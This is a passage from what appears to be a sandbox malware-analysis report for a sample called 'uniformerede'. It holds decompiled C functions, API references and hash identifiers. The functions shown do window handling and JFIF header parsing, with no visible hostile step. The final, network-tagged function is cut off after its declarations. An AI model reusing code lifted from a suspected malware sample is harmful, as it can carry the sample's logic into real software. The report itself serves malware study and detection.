					if( *((intOrPtr*)(_t51 + 0x44)) == 0 ||  *((char*)(_t51 + 0x5b)) == 0 &&  *((char*)( *((intOrPtr*)(_t51 + 0x44)) + 0x57)) == 0) {
						L6:
						E0045906C( *(_t51 + 0x30), 9, __eflags);
					} else {
						_t60 = IsWindowEnabled(E00441704( *((intOrPtr*)(_t51 + 0x44))));
						if(_t60 == 0) {
							goto L6;
						} else {
							_push(0);
							_push(0xf120);
							_push(0x112);
							_push( *(_t51 + 0x30));
							L00407540();
						}
					}
					_t26 =  *0x49d970; // 0x49e900
					_t29 =  *((intOrPtr*)( *_t26))(1, 0, 0, 0x40) >> 1;
					if(_t60 < 0) {
						asm("adc eax, 0x0");
					}
					_t30 =  *0x49d970; // 0x49e900
					_t33 =  *((intOrPtr*)( *_t30))(0, _t29) >> 1;
					if(_t60 < 0) {
						asm("adc eax, 0x0");
					}
					SetWindowPos( *(_t51 + 0x30), 0, _t33, ??, ??, ??, ??);
					_t36 =  *((intOrPtr*)(_t51 + 0x44));
					if(_t36 != 0 &&  *((char*)(_t36 + 0x22b)) == 1 &&  *((char*)(_t36 + 0x57)) == 0) {
						E00454D78(_t36, 0);
						E00457194( *((intOrPtr*)(_t51 + 0x44)));
					}
					E0045974C(_t51);
					_t21 =  *0x49ebbc; // 0x0
					_t55 =  *((intOrPtr*)(_t21 + 0x64));
					if( *((intOrPtr*)(_t21 + 0x64)) != 0) {
						_t21 = SetFocus(E00441704(_t55));
					}
					if( *((short*)(_t51 + 0x122)) != 0) {
						return  *((intOrPtr*)(_t51 + 0x120))();
					}
				}
				return _t21;
			}











                                                                                                                                                                                                                            0x0045a106
                                                                                                                                                                                                                            0x0045a10c
                                                                                                                                                                                                                            0x0045a113
                                                                                                                                                                                                                            0x0045a11d
                                                                                                                                                                                                                            0x0045a126
                                                                                                                                                                                                                            0x0045a160
                                                                                                                                                                                                                            0x0045a168
                                                                                                                                                                                                                            0x0045a137
                                                                                                                                                                                                                            0x0045a145
                                                                                                                                                                                                                            0x0045a147
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x0045a149
                                                                                                                                                                                                                            0x0045a149
                                                                                                                                                                                                                            0x0045a14b
                                                                                                                                                                                                                            0x0045a150
                                                                                                                                                                                                                            0x0045a158
                                                                                                                                                                                                                            0x0045a159
                                                                                                                                                                                                                            0x0045a159
                                                                                                                                                                                                                            0x0045a147
                                                                                                                                                                                                                            0x0045a175
                                                                                                                                                                                                                            0x0045a17e
                                                                                                                                                                                                                            0x0045a180
                                                                                                                                                                                                                            0x0045a182
                                                                                                                                                                                                                            0x0045a182
                                                                                                                                                                                                                            0x0045a188
                                                                                                                                                                                                                            0x0045a191
                                                                                                                                                                                                                            0x0045a193
                                                                                                                                                                                                                            0x0045a195
                                                                                                                                                                                                                            0x0045a195
                                                                                                                                                                                                                            0x0045a19f
                                                                                                                                                                                                                            0x0045a1a4
                                                                                                                                                                                                                            0x0045a1a9
                                                                                                                                                                                                                            0x0045a1bc
                                                                                                                                                                                                                            0x0045a1c4
                                                                                                                                                                                                                            0x0045a1c4
                                                                                                                                                                                                                            0x0045a1cb
                                                                                                                                                                                                                            0x0045a1d0
                                                                                                                                                                                                                            0x0045a1d5
                                                                                                                                                                                                                            0x0045a1da
                                                                                                                                                                                                                            0x0045a1e4
                                                                                                                                                                                                                            0x0045a1e4
                                                                                                                                                                                                                            0x0045a1f1
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x0045a1fb
                                                                                                                                                                                                                            0x0045a1f1
                                                                                                                                                                                                                            0x0045a203

                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                            • IsIconic.USER32 ref: 0045A10C
                                                                                                                                                                                                                            • SetActiveWindow.USER32(?,?,?,?,00459B2D,00000000,00459FEE), ref: 0045A11D
                                                                                                                                                                                                                            • IsWindowEnabled.USER32(00000000), ref: 0045A140
                                                                                                                                                                                                                            • NtdllDefWindowProc_A.USER32(?,00000112,0000F120,00000000,00000000,?,?,?,?,00459B2D,00000000,00459FEE), ref: 0045A159
                                                                                                                                                                                                                            • SetWindowPos.USER32(?,00000000,00000000,?,?,00459B2D,00000000,00459FEE), ref: 0045A19F
                                                                                                                                                                                                                            • SetFocus.USER32(00000000,?,00000000,00000000,?,?,00459B2D,00000000,00459FEE), ref: 0045A1E4
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 00000006.00000002.286644380.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                            • Associated: 00000006.00000002.286640242.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000006.00000002.286711673.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000006.00000002.286719148.00000000004A5000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                            • Snapshot File: hcaresult_6_2_400000_uniformerede.jbxd
                                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID: Window$ActiveEnabledFocusIconicNtdllProc_
                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                            • API String ID: 3996302123-0
                                                                                                                                                                                                                            • Opcode ID: a04679a4ac2906456c8448a2d84214dddb4dc2f3039b57f19c98973d0d101b18
                                                                                                                                                                                                                            • Instruction ID: e53a9b633d1b0bd006f11759a665d113d80ac3550e73a578dd09315b07be2b8d
                                                                                                                                                                                                                            • Opcode Fuzzy Hash: a04679a4ac2906456c8448a2d84214dddb4dc2f3039b57f19c98973d0d101b18
                                                                                                                                                                                                                            • Instruction Fuzzy Hash: B831DD71B006009BEB11EB69CD86B563798AB04709F0805AAFE04DF2D7D67DEC58C75A
                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                            Function 004410F0 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 81windowCOMMON
                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                            C-Code - Quality: 85%
                                                                                                                                                                                                                            			E004410F0(void* __eax, int __ecx, int __edx, int _a4, int _a8) {
				void* _v20;
				struct _WINDOWPLACEMENT _v48;
				char _v64;
				void* _t31;
				int _t45;
				int _t51;
				void* _t52;
				int _t56;
				int _t58;

				_t56 = __ecx;
				_t58 = __edx;
				_t52 = __eax;
				if(__edx !=  *((intOrPtr*)(__eax + 0x40)) || __ecx !=  *((intOrPtr*)(__eax + 0x44)) || _a8 !=  *((intOrPtr*)(__eax + 0x48))) {
					L4:
					if(E00441A08(_t52) == 0) {
						L7:
						 *(_t52 + 0x40) = _t58;
						 *(_t52 + 0x44) = _t56;
						 *((intOrPtr*)(_t52 + 0x48)) = _a8;
						 *((intOrPtr*)(_t52 + 0x4c)) = _a4;
						_t31 = E00441A08(_t52);
						__eflags = _t31;
						if(_t31 != 0) {
							_v48.length = 0x2c;
							GetWindowPlacement( *(_t52 + 0x180),  &_v48);
							E0043A91C(_t52,  &_v64);
							asm("movsd");
							asm("movsd");
							asm("movsd");
							asm("movsd");
							SetWindowPlacement( *(_t52 + 0x180),  &_v48);
						}
						L9:
						E0043A5D0(_t52);
						return E00403DE8(_t52, _t66);
					}
					_t45 = IsIconic( *(_t52 + 0x180));
					_t66 = _t45;
					if(_t45 != 0) {
						goto L7;
					}
					SetWindowPos( *(_t52 + 0x180), 0, _t58, _t56, _a8, _a4, 0x14);
					goto L9;
				} else {
					_t51 = _a4;
					if(_t51 ==  *((intOrPtr*)(__eax + 0x4c))) {
						return _t51;
					}
					goto L4;
				}
			}












                                                                                                                                                                                                                            0x004410f9
                                                                                                                                                                                                                            0x004410fb
                                                                                                                                                                                                                            0x004410fd
                                                                                                                                                                                                                            0x00441102
                                                                                                                                                                                                                            0x0044111d
                                                                                                                                                                                                                            0x00441126
                                                                                                                                                                                                                            0x00441154
                                                                                                                                                                                                                            0x00441154
                                                                                                                                                                                                                            0x00441157
                                                                                                                                                                                                                            0x0044115d
                                                                                                                                                                                                                            0x00441163
                                                                                                                                                                                                                            0x00441168
                                                                                                                                                                                                                            0x0044116d
                                                                                                                                                                                                                            0x0044116f
                                                                                                                                                                                                                            0x00441171
                                                                                                                                                                                                                            0x00441183
                                                                                                                                                                                                                            0x0044118d
                                                                                                                                                                                                                            0x00441198
                                                                                                                                                                                                                            0x00441199
                                                                                                                                                                                                                            0x0044119a
                                                                                                                                                                                                                            0x0044119b
                                                                                                                                                                                                                            0x004411a7
                                                                                                                                                                                                                            0x004411a7
                                                                                                                                                                                                                            0x004411ac
                                                                                                                                                                                                                            0x004411ae
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x004411b9
                                                                                                                                                                                                                            0x0044112f
                                                                                                                                                                                                                            0x00441134
                                                                                                                                                                                                                            0x00441136
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x0044114d
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x00441111
                                                                                                                                                                                                                            0x00441111
                                                                                                                                                                                                                            0x00441117
                                                                                                                                                                                                                            0x004411c4
                                                                                                                                                                                                                            0x004411c4
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x00441117

                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                            • IsIconic.USER32 ref: 0044112F
                                                                                                                                                                                                                            • SetWindowPos.USER32(?,00000000,?,?,?,?,00000014,?), ref: 0044114D
                                                                                                                                                                                                                            • GetWindowPlacement.USER32(?,0000002C), ref: 00441183
                                                                                                                                                                                                                            • SetWindowPlacement.USER32(?,0000002C,?,0000002C), ref: 004411A7
                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 00000006.00000002.286644380.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                            • Associated: 00000006.00000002.286640242.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000006.00000002.286711673.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000006.00000002.286719148.00000000004A5000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                            • Snapshot File: hcaresult_6_2_400000_uniformerede.jbxd
                                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID: Window$Placement$Iconic
                                                                                                                                                                                                                            • String ID: ,
                                                                                                                                                                                                                            • API String ID: 568898626-3772416878
                                                                                                                                                                                                                            • Opcode ID: cbc295ee499962ac83a9ff01bfd7ce2be257ba844d1b33c8d8d56419791f1386
                                                                                                                                                                                                                            • Instruction ID: 973ca0ced29493b3e0d87defc8b2cb9363f4da81e4e6ee6b5ea2909c58c8dcf6
                                                                                                                                                                                                                            • Opcode Fuzzy Hash: cbc295ee499962ac83a9ff01bfd7ce2be257ba844d1b33c8d8d56419791f1386
                                                                                                                                                                                                                            • Instruction Fuzzy Hash: AA21B271A00108ABDF10EF69C8C19DA77A8AF4D354F00406AFE14EF352D779ED448B65
                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                            Function 0045A054 Relevance: 7.6, APIs: 5, Instructions: 59nativewindowCOMMON
                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                            C-Code - Quality: 79%
                                                                                                                                                                                                                            			E0045A054(void* __eax) {
				int _t21;
				struct HWND__* _t36;
				void* _t40;

				_t40 = __eax;
				_t1 = _t40 + 0x30; // 0x0
				_t21 = IsIconic( *_t1);
				if(_t21 == 0) {
					E0045973C();
					_t2 = _t40 + 0x30; // 0x0
					SetActiveWindow( *_t2);
					if( *((intOrPtr*)(_t40 + 0x44)) == 0 ||  *((char*)(_t40 + 0x5b)) == 0 &&  *((char*)( *((intOrPtr*)(_t40 + 0x44)) + 0x57)) == 0 || IsWindowEnabled(E00441704( *((intOrPtr*)(_t40 + 0x44)))) == 0) {
						_t15 = _t40 + 0x30; // 0x0
						_t21 = E0045906C( *_t15, 6, __eflags);
					} else {
						_t43 =  *((intOrPtr*)(_t40 + 0x44));
						_t36 = E00441704( *((intOrPtr*)(_t40 + 0x44)));
						_t13 = _t40 + 0x30; // 0x0
						SetWindowPos( *_t13, _t36,  *( *((intOrPtr*)(_t40 + 0x44)) + 0x40),  *( *((intOrPtr*)(_t40 + 0x44)) + 0x44),  *(_t43 + 0x48), 0, 0x40);
						_push(0);
						_push(0xf020);
						_push(0x112);
						_t14 = _t40 + 0x30; // 0x0
						_t21 =  *_t14;
						_push(_t21);
						L00407540();
					}
					if( *((short*)(_t40 + 0x11a)) != 0) {
						return  *((intOrPtr*)(_t40 + 0x118))();
					}
				}
				return _t21;
			}






                                                                                                                                                                                                                            0x0045a056
                                                                                                                                                                                                                            0x0045a058
                                                                                                                                                                                                                            0x0045a05c
                                                                                                                                                                                                                            0x0045a063
                                                                                                                                                                                                                            0x0045a06b
                                                                                                                                                                                                                            0x0045a070
                                                                                                                                                                                                                            0x0045a074
                                                                                                                                                                                                                            0x0045a07d
                                                                                                                                                                                                                            0x0045a0e1
                                                                                                                                                                                                                            0x0045a0e4
                                                                                                                                                                                                                            0x0045a0a0
                                                                                                                                                                                                                            0x0045a0a4
                                                                                                                                                                                                                            0x0045a0b6
                                                                                                                                                                                                                            0x0045a0bc
                                                                                                                                                                                                                            0x0045a0c0
                                                                                                                                                                                                                            0x0045a0c5
                                                                                                                                                                                                                            0x0045a0c7
                                                                                                                                                                                                                            0x0045a0cc
                                                                                                                                                                                                                            0x0045a0d1
                                                                                                                                                                                                                            0x0045a0d1
                                                                                                                                                                                                                            0x0045a0d4
                                                                                                                                                                                                                            0x0045a0d5
                                                                                                                                                                                                                            0x0045a0d5
                                                                                                                                                                                                                            0x0045a0f1
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x0045a0fb
                                                                                                                                                                                                                            0x0045a0f1
                                                                                                                                                                                                                            0x0045a103

                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                            • IsIconic.USER32 ref: 0045A05C
                                                                                                                                                                                                                            • SetActiveWindow.USER32(00000000,00000000,?,?,0045A790), ref: 0045A074
                                                                                                                                                                                                                            • IsWindowEnabled.USER32(00000000), ref: 0045A097
                                                                                                                                                                                                                            • SetWindowPos.USER32(00000000,00000000,?,?,?,00000000,00000040,00000000,00000000,00000000,?,?,0045A790), ref: 0045A0C0
                                                                                                                                                                                                                            • NtdllDefWindowProc_A.USER32(00000000,00000112,0000F020,00000000,00000000,00000000,?,?,?,00000000,00000040,00000000,00000000,00000000), ref: 0045A0D5
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 00000006.00000002.286644380.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                            • Associated: 00000006.00000002.286640242.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000006.00000002.286711673.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000006.00000002.286719148.00000000004A5000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                            • Snapshot File: hcaresult_6_2_400000_uniformerede.jbxd
                                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID: Window$ActiveEnabledIconicNtdllProc_
                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                            • API String ID: 1720852555-0
                                                                                                                                                                                                                            • Opcode ID: 8ef17a5689defe69a59b169c72c27f81d88e002240e7c90d7581b2bd6a1a7dc2
                                                                                                                                                                                                                            • Instruction ID: fcf5efa9db48042d746d78bebf6e1cf2cc32c712e84d9ef6b3749e70c2da43cc
                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 8ef17a5689defe69a59b169c72c27f81d88e002240e7c90d7581b2bd6a1a7dc2
                                                                                                                                                                                                                            • Instruction Fuzzy Hash: EF110071650200EBDB54EE69C9C6B9637E8AF04715F0800AABF04DF2D7D679EC448759
                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                            Function 0042C6FC Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 46COMMON
                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                            C-Code - Quality: 79%
                                                                                                                                                                                                                            			E0042C6FC(void* __edi, struct HWND__* _a4, signed int _a8) {
				struct _WINDOWPLACEMENT _v48;
				void* __ebx;
				void* __esi;
				void* __ebp;
				signed int _t19;
				intOrPtr _t21;
				struct HWND__* _t23;

				_t19 = _a8;
				_t23 = _a4;
				if( *0x49e929 != 0) {
					if((_t19 & 0x00000003) == 0) {
						if(IsIconic(_t23) == 0) {
							GetWindowRect(_t23,  &(_v48.rcNormalPosition));
						} else {
							GetWindowPlacement(_t23,  &_v48);
						}
						return E0042C66C( &(_v48.rcNormalPosition), _t19);
					}
					return 0x12340042;
				}
				_t21 =  *0x49e904; // 0x42c6fc
				 *0x49e904 = E0042C4FC(1, _t19, _t21, __edi, _t23);
				return  *0x49e904(_t23, _t19);
			}










                                                                                                                                                                                                                            0x0042c704
                                                                                                                                                                                                                            0x0042c707
                                                                                                                                                                                                                            0x0042c711
                                                                                                                                                                                                                            0x0042c73b
                                                                                                                                                                                                                            0x0042c74c
                                                                                                                                                                                                                            0x0042c75f
                                                                                                                                                                                                                            0x0042c74e
                                                                                                                                                                                                                            0x0042c753
                                                                                                                                                                                                                            0x0042c753
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x0042c769
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x0042c73d
                                                                                                                                                                                                                            0x0042c718
                                                                                                                                                                                                                            0x0042c725
                                                                                                                                                                                                                            0x00000000

                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 00000006.00000002.286644380.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                            • Associated: 00000006.00000002.286640242.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000006.00000002.286711673.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000006.00000002.286719148.00000000004A5000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                            • Snapshot File: hcaresult_6_2_400000_uniformerede.jbxd
                                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID: AddressProc
                                                                                                                                                                                                                            • String ID: MonitorFromWindow
                                                                                                                                                                                                                            • API String ID: 190572456-2842599566
                                                                                                                                                                                                                            • Opcode ID: 8d1f9452d8f12363e96bde9292e11cbfcc82fa1fc2827bfdbdac76f16a64d1e2
                                                                                                                                                                                                                            • Instruction ID: a470fbf3681d2cee79b4262df8cd97740cfa3d316a724833ce9ade3e4696291a
                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 8d1f9452d8f12363e96bde9292e11cbfcc82fa1fc2827bfdbdac76f16a64d1e2
                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 1201ADB1A051296A8B00EB65ADC19BF735C9B84354B900037F810A3241D72CBE019BAE
                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                            Function 0046B1E4 Relevance: 6.4, Strings: 5, Instructions: 179COMMONCrypto
                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                            C-Code - Quality: 100%
                                                                                                                                                                                                                            			E0046B1E4(intOrPtr* __eax, char* __edx, intOrPtr _a4) {
				intOrPtr _v8;
				intOrPtr _t83;
				intOrPtr _t86;
				intOrPtr _t89;
				intOrPtr _t92;
				intOrPtr _t95;
				intOrPtr* _t106;
				intOrPtr _t115;
				intOrPtr _t118;
				intOrPtr _t121;
				char* _t124;
				intOrPtr _t125;
				void* _t151;
				void* _t153;
				intOrPtr _t180;
				intOrPtr _t181;
				intOrPtr* _t182;

				_v8 = _t125;
				_t124 = __edx;
				_t182 = __eax;
				_t180 = _v8 + _a4;
				if(_v8 < 0xe ||  *__edx != 0x4a ||  *((char*)(__edx + 1)) != 0x46 ||  *((char*)(__edx + 2)) != 0x49 ||  *((char*)(__edx + 3)) != 0x46 ||  *((char*)(__edx + 4)) != 0) {
					if(_v8 < 6 ||  *_t124 != 0x4a ||  *((char*)(_t124 + 1)) != 0x46 ||  *((char*)(_t124 + 2)) != 0x58 ||  *((char*)(_t124 + 3)) != 0x58 ||  *((char*)(_t124 + 4)) != 0) {
						_t83 =  *_t182;
						 *((intOrPtr*)(_t83 + 0x14)) = 0x4d;
						 *((intOrPtr*)(_t83 + 0x18)) = _t180;
						return  *((intOrPtr*)( *_t182 + 4))();
					} else {
						_t151 =  *((intOrPtr*)(_t124 + 5)) - 0x10;
						if(_t151 == 0) {
							_t86 =  *_t182;
							 *((intOrPtr*)(_t86 + 0x14)) = 0x6c;
							 *((intOrPtr*)(_t86 + 0x18)) = _t180;
							return  *((intOrPtr*)( *_t182 + 4))();
						}
						_t153 = _t151 - 1;
						if(_t153 == 0) {
							_t89 =  *_t182;
							 *((intOrPtr*)(_t89 + 0x14)) = 0x6d;
							 *((intOrPtr*)(_t89 + 0x18)) = _t180;
							return  *((intOrPtr*)( *_t182 + 4))();
						}
						if(_t153 == 2) {
							_t92 =  *_t182;
							 *((intOrPtr*)(_t92 + 0x14)) = 0x6e;
							 *((intOrPtr*)(_t92 + 0x18)) = _t180;
							return  *((intOrPtr*)( *_t182 + 4))();
						}
						_t95 =  *_t182;
						 *((intOrPtr*)(_t95 + 0x14)) = 0x59;
						 *((intOrPtr*)(_t95 + 0x18)) = 0;
						 *((intOrPtr*)(_t95 + 0x1c)) = _t180;
						return  *((intOrPtr*)( *_t182 + 4))();
					}
				}
				 *((intOrPtr*)(__eax + 0x118)) = 1;
				 *((char*)(__eax + 0x11c)) =  *((intOrPtr*)(__edx + 5));
				 *((char*)(__eax + 0x11d)) =  *((intOrPtr*)(__edx + 6));
				 *((char*)(__eax + 0x11e)) =  *((intOrPtr*)(__edx + 7));
				 *((short*)(__eax + 0x120)) = (0 << 8) +  *((intOrPtr*)(__edx + 9));
				 *((short*)(__eax + 0x122)) = (0 << 8) +  *((intOrPtr*)(__edx + 0xb));
				if( *((char*)(__eax + 0x11c)) != 1) {
					_t121 =  *__eax;
					 *((intOrPtr*)(_t121 + 0x14)) = 0x77;
					 *((intOrPtr*)(_t121 + 0x18)) = 0;
					 *((intOrPtr*)(_t121 + 0x1c)) = 0;
					 *((intOrPtr*)( *__eax + 4))();
				}
				_t106 =  *_t182 + 0x18;
				 *_t106 = 0;
				 *((intOrPtr*)(_t106 + 4)) = 0;
				 *(_t106 + 8) =  *(_t182 + 0x120) & 0x0000ffff;
				 *(_t106 + 0xc) =  *(_t182 + 0x122) & 0x0000ffff;
				 *((intOrPtr*)(_t106 + 0x10)) = 0;
				 *((intOrPtr*)( *_t182 + 0x14)) = 0x57;
				 *((intOrPtr*)( *_t182 + 4))();
				if(( *(_t124 + 0xc) |  *(_t124 + 0xd)) != 0) {
					_t118 =  *_t182;
					 *((intOrPtr*)(_t118 + 0x14)) = 0x5a;
					 *((intOrPtr*)(_t118 + 0x18)) = 0;
					 *((intOrPtr*)(_t118 + 0x1c)) = 0;
					 *((intOrPtr*)( *_t182 + 4))();
				}
				_t181 = _t180 - 0xe;
				if(_t181 != 0) {
					_t115 =  *_t182;
					 *((intOrPtr*)(_t115 + 0x14)) = 0x58;
					 *((intOrPtr*)(_t115 + 0x18)) = _t181;
					return  *((intOrPtr*)( *_t182 + 4))();
				}
				return 0;
			}




















                                                                                                                                                                                                                            0x0046b1eb
                                                                                                                                                                                                                            0x0046b1ee
                                                                                                                                                                                                                            0x0046b1f0
                                                                                                                                                                                                                            0x0046b1f5
                                                                                                                                                                                                                            0x0046b1fc
                                                                                                                                                                                                                            0x0046b36e
                                                                                                                                                                                                                            0x0046b428
                                                                                                                                                                                                                            0x0046b42f
                                                                                                                                                                                                                            0x0046b436
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x0046b3a5
                                                                                                                                                                                                                            0x0046b3a8
                                                                                                                                                                                                                            0x0046b3ab
                                                                                                                                                                                                                            0x0046b3b8
                                                                                                                                                                                                                            0x0046b3bf
                                                                                                                                                                                                                            0x0046b3c6
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x0046b3cd
                                                                                                                                                                                                                            0x0046b3ad
                                                                                                                                                                                                                            0x0046b3af
                                                                                                                                                                                                                            0x0046b3d2
                                                                                                                                                                                                                            0x0046b3d9
                                                                                                                                                                                                                            0x0046b3e0
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x0046b3e7
                                                                                                                                                                                                                            0x0046b3b4
                                                                                                                                                                                                                            0x0046b3ec
                                                                                                                                                                                                                            0x0046b3f3
                                                                                                                                                                                                                            0x0046b3fa
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x0046b401
                                                                                                                                                                                                                            0x0046b406
                                                                                                                                                                                                                            0x0046b40a
                                                                                                                                                                                                                            0x0046b414
                                                                                                                                                                                                                            0x0046b417
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x0046b423
                                                                                                                                                                                                                            0x0046b36e
                                                                                                                                                                                                                            0x0046b233
                                                                                                                                                                                                                            0x0046b240
                                                                                                                                                                                                                            0x0046b24b
                                                                                                                                                                                                                            0x0046b256
                                                                                                                                                                                                                            0x0046b26a
                                                                                                                                                                                                                            0x0046b27f
                                                                                                                                                                                                                            0x0046b28d
                                                                                                                                                                                                                            0x0046b28f
                                                                                                                                                                                                                            0x0046b295
                                                                                                                                                                                                                            0x0046b2a2
                                                                                                                                                                                                                            0x0046b2ae
                                                                                                                                                                                                                            0x0046b2b5
                                                                                                                                                                                                                            0x0046b2b5
                                                                                                                                                                                                                            0x0046b2ba
                                                                                                                                                                                                                            0x0046b2c5
                                                                                                                                                                                                                            0x0046b2cf
                                                                                                                                                                                                                            0x0046b2d9
                                                                                                                                                                                                                            0x0046b2e3
                                                                                                                                                                                                                            0x0046b2ee
                                                                                                                                                                                                                            0x0046b2f3
                                                                                                                                                                                                                            0x0046b303
                                                                                                                                                                                                                            0x0046b30c
                                                                                                                                                                                                                            0x0046b30e
                                                                                                                                                                                                                            0x0046b314
                                                                                                                                                                                                                            0x0046b31e
                                                                                                                                                                                                                            0x0046b329
                                                                                                                                                                                                                            0x0046b330
                                                                                                                                                                                                                            0x0046b330
                                                                                                                                                                                                                            0x0046b33f
                                                                                                                                                                                                                            0x0046b347
                                                                                                                                                                                                                            0x0046b34d
                                                                                                                                                                                                                            0x0046b354
                                                                                                                                                                                                                            0x0046b35b
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x0046b362
                                                                                                                                                                                                                            0x0046b445

                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 00000006.00000002.286644380.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                            • Associated: 00000006.00000002.286640242.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000006.00000002.286711673.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000006.00000002.286719148.00000000004A5000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                            • Snapshot File: hcaresult_6_2_400000_uniformerede.jbxd
                                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                                            • String ID: F$J$J$X$X
                                                                                                                                                                                                                            • API String ID: 0-2166313073
                                                                                                                                                                                                                            • Opcode ID: 12fdb1c193f4f78136981c133ba371dc7561109d75048bcbb9abb70116e7edbf
                                                                                                                                                                                                                            • Instruction ID: 33befd47d124d4f0be4a324bfdbb371183624d475779f292e62bfdc109e5000d
                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 12fdb1c193f4f78136981c133ba371dc7561109d75048bcbb9abb70116e7edbf
                                                                                                                                                                                                                            • Instruction Fuzzy Hash: BB714E706042808FD718CF29C4946A6BFE1EF5A304F19C0DAD8898F367D77AD985CB96
                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                            Function 00474D50 Relevance: 6.1, APIs: 4, Instructions: 90networkfileCOMMON
                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                            C-Code - Quality: 61%
                                                                                                                                                                                                                            			E00474D50(void* __eax, void* __ebx, intOrPtr __edx, void* __esi) {
				intOrPtr _v8;
				char _v9;
				void* _v16;
				void* _v20;
				char _v24;
				char _v28;
				char _v32;
				char _v36;
				void _v1060;
				char _v1392;
				char _v1856;
				DWORD* _t57;
				intOrPtr _t68;
